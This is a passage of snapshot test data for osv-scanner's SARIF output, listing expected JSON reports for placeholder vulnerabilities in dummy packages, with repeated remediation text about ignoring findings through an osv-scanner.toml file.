vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/one_source_with_one_deprecated_package - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] { "$schema": 
"https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` 
file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" 
} } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these 
vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these 
vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these 
vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": 
[], "text": "Package 'mine1@1.2.2' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine3@0.4.1' is vulnerable to 'OSV-3'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-3", "ruleIndex": 2, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-5'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine3@0.4.1' is vulnerable to 'OSV-5'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.2 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 
1.2.2 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## 
[OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" 
} }, { "deprecatedIds": [ "OSV-3" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason 
= \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-3", "name": "OSV-3", "relationships": [], "shortDescription": { "markdown": "OSV-3: Something mildly scary!", "text": "OSV-3: Something mildly scary!" } }, { "deprecatedIds": [ "OSV-5" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not 
affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-5", "name": "OSV-5", "relationships": [], "shortDescription": { "markdown": "OSV-5: Something scarier!", "text": "OSV-5: Something scarier!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, 